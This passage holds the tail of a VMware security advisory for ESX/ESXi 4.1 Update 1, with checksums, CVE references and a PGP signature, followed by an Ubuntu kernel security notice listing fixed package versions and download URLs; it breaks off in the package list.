1c9c644012dec657a705ddd3d033cbfb87a1fab1\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0)\n   File type: .zip\n   MD5SUM: 67b924618d196dafaf268a7691bd1a0f\n   SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516 \t\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5)\n   File type: .zip\n   MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4\n   SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488 \t\n\n   VMware Tools CD image for Linux Guest OSes\n   File type: .iso\n   MD5SUM: dad66fa8ece1dd121c302f45444daa70\n   SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af \t\n\n   VMware vSphere Client\n   File type: .exe\n   MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e\n   SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESXi Installable Update 1 contains the following security bulletins:\n   ESXi410-201101201-SG. \n\n   ESX 4.1 Update 1\n   ----------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html\n   http://kb.vmware.com/kb/1029353\n\n   ESX 4.1 Update 1 (DVD ISO)\n   File type: .iso\n   md5sum: b9a275b419a20c7bedf31c0bf64f504e\n   sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11 \t\n\n   ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1)\n   File type: .zip\n   md5sum: 2d81a87e994aa2b329036f11d90b4c14\n   sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798 \t\n\n   Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1\n   File type: .zip\n   md5sum: 75f8cebfd55d8a81deb57c27def963c2\n   sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2 \t\n\n   ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0)\n   File type: .zip\n   md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2\n   sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922 \t\n\n   VMware Tools CD image for Linux Guest OSes\n   File type: .iso\n   md5sum: dad66fa8ece1dd121c302f45444daa70\n   sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af \t\n\n   VMware vSphere Client\n   File type: .exe\n   md5sum: cb6aa91ada1289575355d79e8c2a9f8e\n   sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESX410-Update01 contains the following security bulletins:\n   ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL,\n   Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904\n   ESX410-201101226-SG (glibc)      | http://kb.vmware.com/kb/1031330\n\n   ESX410-Update01 also contains the following non-security bulletins\n   ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG,\n   ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG,\n   ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG,\n   ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG,\n   ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG,\n   ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG. \n\n   To install an individual bulletin use esxupdate with the -b option. \n\n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2928\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0087\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0089\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0090\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0841\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0843\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0844\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0846\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0849\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0850\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1157\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0433\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0734\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1084\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2066\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2070\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2226\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2248\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2521\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2524\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0415\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0437\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4308\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0003\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0007\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0307\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1086\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0410\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0730\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0291\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0622\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1087\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1088\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1187\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1436\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1641\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574\n\n- ------------------------------------------------------------------------\n6. Change log\n\n2011-02-10  VMSA-2011-0003\nInitial security advisory in conjunction with the release of vCenter\nServer 4.1 Update 1, vCenter Update Manager 4.1 Update 1, ESXi 4.1\nUpdate 1, and ESX 4.1 Update 1 on 2011-02-10. \n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisories\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2011 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAk1U1eoACgkQS2KysvBH1xm3swCfeh4sWvPOubDT1K7QlRj3SjW9\ndxYAmwbNLMR9IG/rKZDYh9hqcf4IldCX\n=2pVj\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. ===========================================================\nUbuntu Security Notice USN-914-1             March 17, 2010\nlinux, linux-source-2.6.15 vulnerabilities\nCVE-2010-0307, CVE-2010-0309, CVE-2010-0410, CVE-2010-0415,\nCVE-2010-0622, CVE-2010-0623\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 8.10\nUbuntu 9.04\nUbuntu 9.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-55-386       2.6.15-55.83\n  linux-image-2.6.15-55-686       2.6.15-55.83\n  linux-image-2.6.15-55-amd64-generic  2.6.15-55.83\n  linux-image-2.6.15-55-amd64-k8  2.6.15-55.83\n  linux-image-2.6.15-55-amd64-server  2.6.15-55.83\n  linux-image-2.6.15-55-amd64-xeon  2.6.15-55.83\n  linux-image-2.6.15-55-hppa32    2.6.15-55.83\n  linux-image-2.6.15-55-hppa32-smp  2.6.15-55.83\n  linux-image-2.6.15-55-hppa64    2.6.15-55.83\n  linux-image-2.6.15-55-hppa64-smp  2.6.15-55.83\n  linux-image-2.6.15-55-itanium   2.6.15-55.83\n  linux-image-2.6.15-55-itanium-smp  2.6.15-55.83\n  linux-image-2.6.15-55-k7        2.6.15-55.83\n  linux-image-2.6.15-55-mckinley  2.6.15-55.83\n  linux-image-2.6.15-55-mckinley-smp  2.6.15-55.83\n  linux-image-2.6.15-55-powerpc   2.6.15-55.83\n  linux-image-2.6.15-55-powerpc-smp  2.6.15-55.83\n  linux-image-2.6.15-55-powerpc64-smp  2.6.15-55.83\n  linux-image-2.6.15-55-server    2.6.15-55.83\n  linux-image-2.6.15-55-server-bigiron  2.6.15-55.83\n  linux-image-2.6.15-55-sparc64   2.6.15-55.83\n  linux-image-2.6.15-55-sparc64-smp  2.6.15-55.83\n\nUbuntu 8.04 LTS:\n  linux-image-2.6.24-27-386       2.6.24-27.68\n  linux-image-2.6.24-27-generic   2.6.24-27.68\n  linux-image-2.6.24-27-hppa32    2.6.24-27.68\n  linux-image-2.6.24-27-hppa64    2.6.24-27.68\n  linux-image-2.6.24-27-itanium   2.6.24-27.68\n  linux-image-2.6.24-27-lpia      2.6.24-27.68\n  linux-image-2.6.24-27-lpiacompat  2.6.24-27.68\n  linux-image-2.6.24-27-mckinley  2.6.24-27.68\n  linux-image-2.6.24-27-openvz    2.6.24-27.68\n  linux-image-2.6.24-27-powerpc   2.6.24-27.68\n  linux-image-2.6.24-27-powerpc-smp  2.6.24-27.68\n  linux-image-2.6.24-27-powerpc64-smp  2.6.24-27.68\n  linux-image-2.6.24-27-rt        2.6.24-27.68\n  linux-image-2.6.24-27-server    2.6.24-27.68\n  linux-image-2.6.24-27-sparc64   2.6.24-27.68\n  linux-image-2.6.24-27-sparc64-smp  2.6.24-27.68\n  linux-image-2.6.24-27-virtual   2.6.24-27.68\n  linux-image-2.6.24-27-xen       2.6.24-27.68\n\nUbuntu 8.10:\n  linux-image-2.6.27-17-generic   2.6.27-17.46\n  linux-image-2.6.27-17-server    2.6.27-17.46\n  linux-image-2.6.27-17-virtual   2.6.27-17.46\n\nUbuntu 9.04:\n  linux-image-2.6.28-18-generic   2.6.28-18.60\n  linux-image-2.6.28-18-imx51     2.6.28-18.60\n  linux-image-2.6.28-18-iop32x    2.6.28-18.60\n  linux-image-2.6.28-18-ixp4xx    2.6.28-18.60\n  linux-image-2.6.28-18-lpia      2.6.28-18.60\n  linux-image-2.6.28-18-server    2.6.28-18.60\n  linux-image-2.6.28-18-versatile  2.6.28-18.60\n  linux-image-2.6.28-18-virtual   2.6.28-18.60\n\nUbuntu 9.10:\n  linux-image-2.6.31-109-imx51    2.6.31-109.25\n  linux-image-2.6.31-20-386       2.6.31-20.58\n  linux-image-2.6.31-20-generic   2.6.31-20.58\n  linux-image-2.6.31-20-generic-pae  2.6.31-20.58\n  linux-image-2.6.31-20-ia64      2.6.31-20.58\n  linux-image-2.6.31-20-lpia      2.6.31-20.58\n  linux-image-2.6.31-20-powerpc   2.6.31-20.58\n  linux-image-2.6.31-20-powerpc-smp  2.6.31-20.58\n  linux-image-2.6.31-20-powerpc64-smp  2.6.31-20.58\n  linux-image-2.6.31-20-server    2.6.31-20.58\n  linux-image-2.6.31-20-sparc64   2.6.31-20.58\n  linux-image-2.6.31-20-sparc64-smp  2.6.31-20.58\n  linux-image-2.6.31-20-virtual   2.6.31-20.58\n  linux-image-2.6.31-212-dove     2.6.31-212.26\n  linux-image-2.6.31-212-dove-z0  2.6.31-212.26\n  linux-image-2.6.31-305-ec2      2.6.31-305.13\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nDetails follow:\n\nMathias Krause discovered that the Linux kernel did not correctly handle\nmissing ELF interpreters. (CVE-2010-0307)\n\nMarcelo Tosatti discovered that the Linux kernel\u0027s hardware virtualization\ndid not correctly handle reading the /dev/port special device. \n(CVE-2010-0309)\n\nSebastian Krahmer discovered that the Linux kernel did not correctly\nhandle netlink connector messages.  (CVE-2010-0415)\n\nJermome Marchand and Mikael Pettersson discovered that the Linux kernel\ndid not correctly handle certain futex operations. \n(CVE-2010-0622, CVE-2010-0623)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.83.diff.gz\n      Size/MD5:  2954001 a76ac184052d21b4f80c0001be2958ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.83.dsc\n      Size/MD5:     2439 35112e651762a697c560ad30f96d1199\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.83_all.deb\n      Size/MD5:  5167438 2556995d77356b59ca8aeaf4a52fcc5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.83_all.deb\n      Size/MD5:    96558 4aff0ca2bacb498944f8e6e2528109e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.83_all.deb\n      Size/MD5: 44746982 14122641ee51ed24ff6a086a8afbe3c8\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    22344 7823f908555a0edda63e17020e0a4441\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    44762 28c193429fab6d138eeb26a6f35612bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:     2312 e2403b081907b0b77fc1f2ee24c8b731\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    36294 256063685e2ad4c928266de1529abea1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   102358 de6d8ed61c2070d6b82fd43a3e9ee933\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    38890 0db32c114cbb7c332209bce75e137361\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    49154 fc382c582f2fada38021a45de1cb366d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   176620 cf6274ee632f10701fc34c70cecbc5c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    36770 ddc7734060d15267613bae0d471ccfc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   142350 5f923f40306467be653e98032668ba07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    51060 225a9c9e98e32327981c2595172d078e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   140708 034574e2bc1f265668ea546ab37653ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   287602 f5fbe6ea8cbd03ce421e0568eeaa7002\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    97832 e8be7fefc3deba54a661edf75d27f3f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:  1652140 a05d2f587d2ac7ddedc5e82e2bbdb27e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.83_amd64.deb\n      Size/MD5:   872326 38dc5abd2d8ef8d535bd6c81eb28717c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.83_amd64.deb\n      Size/MD5:   870656 6ae3197e5bd622a88d4bf674de768f6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.83_amd64.deb\n      Size/MD5:   870222 7f7e0f0efff6958167e0e7778f67a6ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.83_amd64.deb\n      Size/MD5:   867844 15194cc40c8c7229b07d5565ab4e61b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_amd64.deb\n      Size/MD5:  6925232 e6e09b4efc6ce644f0c10c2e5da63bd6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.83_amd64.deb\n      Size/MD5: 20818066 8f693fb75cb349914830ed42a8de8a9c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.83_amd64.deb\n      Size/MD5: 20797294 35ff0e2a3045446635b4130ab7559414\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.83_amd64.deb\n      Size/MD5: 21634748 7fc0676610bfd14ef55d29f10769b909\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.83_amd64.deb\n      Size/MD5: 19904914 900e8fd3d1ae64c71952de3d31eca409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    15626 43f3ac89b318c84e30514338a83520f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   240374 7e75e5e07c2a3d9423cd89f32ec17539\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   202662 107786bd43369769134130a40d9cb5e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:  1048612 62a414a37611feeb71b632af169acafd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:  1543636 198517172092a5f7440e69d144373f3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   161690 0d95184b543be1650381f149fe57d786\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:     9832 249ef56f732aebd34fa4bf81bbab677d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    80864 06ae57d637145be92c9fc40068e4740f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    49290 d7ab07f057fde183c79a6475e72cf0a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    35162 c61084c6e6feb8a3287b712b6c190f82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    70894 5b3e430cfaf60278fc592f61734a56b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:     6220 8fd5aacf660001636ab53e4a7a4e6dcb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:     9060 1ff11b1d1f18d0f5640fe82c07a65b03\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    57916 3a948b52edc5f51b4b9c6eca4a303959\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   123380 86e1e50fe5bc309c5aa66efe45be55b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   101078 dbf85d434072a7b5346aa01a978ac7d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    79276 99ca3dc97c5ac28bcddcd18f2a493836\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:  1595366 04da4748792d7c8cd012751b32e01a8a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    72346 a59511cb29f600b503a5f5f3c6b4cadf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    12642 d04fa69b9992761d5e4bc0dee7a37ef8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    33806 5ba0205c7a15fdb347847635d1e543e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   138512 